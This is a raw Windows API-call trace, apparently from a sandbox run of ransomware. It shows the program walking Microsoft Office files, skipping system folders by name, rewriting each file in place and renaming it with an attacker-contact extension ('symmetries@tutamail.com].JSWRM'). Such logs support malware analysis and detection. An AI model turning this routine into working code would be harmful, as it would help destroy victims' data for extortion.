hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=1078) returned 1 [0129.810] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.810] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x430, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e534*=0x430, lpOverlapped=0x0) returned 1 [0129.811] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.811] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x430, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e530*=0x430, lpOverlapped=0x0) returned 1 [0129.811] CloseHandle (hObject=0x314) returned 1 [0129.812] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\DISTLSTL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\distlstl.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\DISTLSTL.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\distlstl.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.812] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb7cf588, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb7cf588, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb7cf588, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xbb6, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="DISTLSTS.ICO", cAlternateFileName="")) returned 1 [0129.812] lstrcmpiW (lpString1="DISTLSTS.ICO", lpString2=".") returned 1 [0129.812] lstrcmpiW (lpString1="DISTLSTS.ICO", lpString2="..") returned 1 [0129.812] lstrcmpiW (lpString1="DISTLSTS.ICO", lpString2="...") returned 1 [0129.812] lstrcmpiW (lpString1="DISTLSTS.ICO", lpString2="windows") returned -1 [0129.812] lstrcmpiW (lpString1="DISTLSTS.ICO", lpString2="recovery") returned -1 [0129.813] lstrcmpiW (lpString1="DISTLSTS.ICO", lpString2="perflogs") returned -1 [0129.813] lstrcmpiW (lpString1="DISTLSTS.ICO", lpString2="documents and settings") returned -1 [0129.813] lstrcmpiW (lpString1="DISTLSTS.ICO", lpString2="$RECYCLE.BIN") returned 1 [0129.813] lstrcmpiW (lpString1="DISTLSTS.ICO", lpString2="system volume information") returned -1 [0129.813] lstrcmpiW (lpString1="DISTLSTS.ICO", lpString2="msocache") returned -1 [0129.813] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DISTLSTS.ICO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.813] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DISTLSTS.ICO", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DISTLSTS.ICO", lpUsedDefaultChar=0x0) returned 12 [0129.813] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DISTLSTS.ICO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.813] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DISTLSTS.ICO", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DISTLSTS.ICO", lpUsedDefaultChar=0x0) returned 12 [0129.813] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.813] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.813] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\DISTLSTS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\distlsts.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0129.813] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2998) returned 1 [0129.814] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.814] ReadFile (in: hFile=0x314, lpBuffer=0x278330, nNumberOfBytesToRead=0xbb0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e534*=0xbb0, lpOverlapped=0x0) returned 1 [0129.816] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.816] WriteFile (in: hFile=0x314, lpBuffer=0x278330*, nNumberOfBytesToWrite=0xbb0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e530*=0xbb0, lpOverlapped=0x0) returned 1 [0129.816] CloseHandle (hObject=0x314) returned 1 [0129.816] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\DISTLSTS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\distlsts.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\DISTLSTS.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\distlsts.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.817] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb7cf588, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb7cf588, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb7cf588, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2fd, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="DOC.CFG", cAlternateFileName="")) returned 1 [0129.817] lstrcmpiW (lpString1="DOC.CFG", lpString2=".") returned 1 [0129.817] lstrcmpiW (lpString1="DOC.CFG", lpString2="..") returned 1 [0129.817] lstrcmpiW (lpString1="DOC.CFG", lpString2="...") returned 1 [0129.817] lstrcmpiW (lpString1="DOC.CFG", lpString2="windows") returned -1 [0129.817] lstrcmpiW (lpString1="DOC.CFG", lpString2="recovery") returned -1 [0129.817] lstrcmpiW (lpString1="DOC.CFG", lpString2="perflogs") returned -1 [0129.817] lstrcmpiW (lpString1="DOC.CFG", lpString2="documents and settings") returned -1 [0129.817] lstrcmpiW (lpString1="DOC.CFG", lpString2="$RECYCLE.BIN") returned 1 [0129.817] lstrcmpiW (lpString1="DOC.CFG", lpString2="system volume information") returned -1 [0129.817] lstrcmpiW (lpString1="DOC.CFG", lpString2="msocache") returned -1 [0129.817] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DOC.CFG", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0129.817] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DOC.CFG", cchWideChar=7, lpMultiByteStr=0x345e870, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DOC.CFG", lpUsedDefaultChar=0x0) returned 7 [0129.817] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DOC.CFG", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0129.817] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DOC.CFG", cchWideChar=7, lpMultiByteStr=0x345e840, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DOC.CFG", lpUsedDefaultChar=0x0) returned 7 [0129.817] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.817] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.817] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\DOC.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\doc.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0129.818] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=765) returned 1 [0129.818] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.818] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x2f0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e534*=0x2f0, lpOverlapped=0x0) returned 1 [0129.820] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.820] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x2f0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e530*=0x2f0, lpOverlapped=0x0) returned 1 [0129.820] CloseHandle (hObject=0x314) returned 1 [0129.820] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\DOC.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\doc.cfg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\DOC.CFG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\doc.cfg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.821] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb7a9345, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb7a9345, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb7cf588, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x436, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="DOCL.ICO", cAlternateFileName="")) returned 1 [0129.821] lstrcmpiW (lpString1="DOCL.ICO", lpString2=".") returned 1 [0129.821] lstrcmpiW (lpString1="DOCL.ICO", lpString2="..") returned 1 [0129.821] lstrcmpiW (lpString1="DOCL.ICO", lpString2="...") returned 1 [0129.821] lstrcmpiW (lpString1="DOCL.ICO", lpString2="windows") returned -1 [0129.821] lstrcmpiW (lpString1="DOCL.ICO", lpString2="recovery") returned -1 [0129.821] lstrcmpiW (lpString1="DOCL.ICO", lpString2="perflogs") returned -1 [0129.821] lstrcmpiW (lpString1="DOCL.ICO", lpString2="documents and settings") returned -1 [0129.821] lstrcmpiW (lpString1="DOCL.ICO", lpString2="$RECYCLE.BIN") returned 1 [0129.821] lstrcmpiW (lpString1="DOCL.ICO", lpString2="system volume information") returned -1 [0129.821] lstrcmpiW (lpString1="DOCL.ICO", lpString2="msocache") returned -1 [0129.821] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DOCL.ICO", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0129.821] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DOCL.ICO", cchWideChar=8, lpMultiByteStr=0x345e870, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DOCL.ICO", lpUsedDefaultChar=0x0) returned 8 [0129.821] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DOCL.ICO", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0129.821] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DOCL.ICO", cchWideChar=8, lpMultiByteStr=0x345e840, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DOCL.ICO", lpUsedDefaultChar=0x0) returned 8 [0129.821] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.821] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.822] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\DOCL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\docl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0129.823] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=1078) returned 1 [0129.823] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.823] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x430, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e534*=0x430, lpOverlapped=0x0) returned 1 [0129.825] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.825] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x430, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e530*=0x430, lpOverlapped=0x0) returned 1 [0129.825] CloseHandle (hObject=0x314) returned 1 [0129.825] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\DOCL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\docl.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\DOCL.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\docl.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.826] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb43bdd5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb43bdd5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb43bdd5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xbb6, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="DOCS.ICO", cAlternateFileName="")) returned 1 [0129.826] lstrcmpiW (lpString1="DOCS.ICO", lpString2=".") returned 1 [0129.826] lstrcmpiW (lpString1="DOCS.ICO", lpString2="..") returned 1 [0129.826] lstrcmpiW (lpString1="DOCS.ICO", lpString2="...") returned 1 [0129.826] lstrcmpiW (lpString1="DOCS.ICO", lpString2="windows") returned -1 [0129.826] lstrcmpiW (lpString1="DOCS.ICO", lpString2="recovery") returned -1 [0129.826] lstrcmpiW (lpString1="DOCS.ICO", lpString2="perflogs") returned -1 [0129.826] lstrcmpiW (lpString1="DOCS.ICO", lpString2="documents and settings") returned -1 [0129.826] lstrcmpiW (lpString1="DOCS.ICO", lpString2="$RECYCLE.BIN") returned 1 [0129.826] lstrcmpiW (lpString1="DOCS.ICO", lpString2="system volume information") returned -1 [0129.826] lstrcmpiW (lpString1="DOCS.ICO", lpString2="msocache") returned -1 [0129.826] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DOCS.ICO", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0129.827] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DOCS.ICO", cchWideChar=8, lpMultiByteStr=0x345e870, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DOCS.ICO", lpUsedDefaultChar=0x0) returned 8 [0129.827] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DOCS.ICO", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0129.827] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DOCS.ICO", cchWideChar=8, lpMultiByteStr=0x345e840, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DOCS.ICO", lpUsedDefaultChar=0x0) returned 8 [0129.827] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.827] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.827] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\DOCS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\docs.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0129.830] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2998) returned 1 [0129.830] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.830] ReadFile (in: hFile=0x314, lpBuffer=0x278330, nNumberOfBytesToRead=0xbb0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e534*=0xbb0, lpOverlapped=0x0) returned 1 [0129.831] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.831] WriteFile (in: hFile=0x314, lpBuffer=0x278330*, nNumberOfBytesToWrite=0xbb0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e530*=0xbb0, lpOverlapped=0x0) returned 1 [0129.832] CloseHandle (hObject=0x314) returned 1 [0129.832] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\DOCS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\docs.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\DOCS.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\docs.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.833] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb7a9345, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb7a9345, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb7cf588, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x346, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="EXITEM.CFG", cAlternateFileName="")) returned 1 [0129.833] lstrcmpiW (lpString1="EXITEM.CFG", lpString2=".") returned 1 [0129.833] lstrcmpiW (lpString1="EXITEM.CFG", lpString2="..") returned 1 [0129.833] lstrcmpiW (lpString1="EXITEM.CFG", lpString2="...") returned 1 [0129.833] lstrcmpiW (lpString1="EXITEM.CFG", lpString2="windows") returned -1 [0129.833] lstrcmpiW (lpString1="EXITEM.CFG", lpString2="recovery") returned -1 [0129.833] lstrcmpiW (lpString1="EXITEM.CFG", lpString2="perflogs") returned -1 [0129.833] lstrcmpiW (lpString1="EXITEM.CFG", lpString2="documents and settings") returned 1 [0129.833] lstrcmpiW (lpString1="EXITEM.CFG", lpString2="$RECYCLE.BIN") returned 1 [0129.833] lstrcmpiW (lpString1="EXITEM.CFG", lpString2="system volume information") returned -1 [0129.833] lstrcmpiW (lpString1="EXITEM.CFG", lpString2="msocache") returned -1 [0129.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXITEM.CFG", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXITEM.CFG", cchWideChar=10, lpMultiByteStr=0x345e870, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EXITEM.CFG", lpUsedDefaultChar=0x0) returned 10 [0129.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXITEM.CFG", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXITEM.CFG", cchWideChar=10, lpMultiByteStr=0x345e840, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EXITEM.CFG", lpUsedDefaultChar=0x0) returned 10 [0129.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.833] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\EXITEM.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\exitem.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0129.834] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=838) returned 1 [0129.834] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.834] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x340, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e534*=0x340, lpOverlapped=0x0) returned 1 [0129.835] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.835] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e530*=0x340, lpOverlapped=0x0) returned 1 [0129.836] CloseHandle (hObject=0x314) returned 1 [0129.836] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\EXITEM.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\exitem.cfg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\EXITEM.CFG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\exitem.cfg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.837] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb548de7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb548de7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeb5e174f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x436, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="EXITEML.ICO", cAlternateFileName="")) 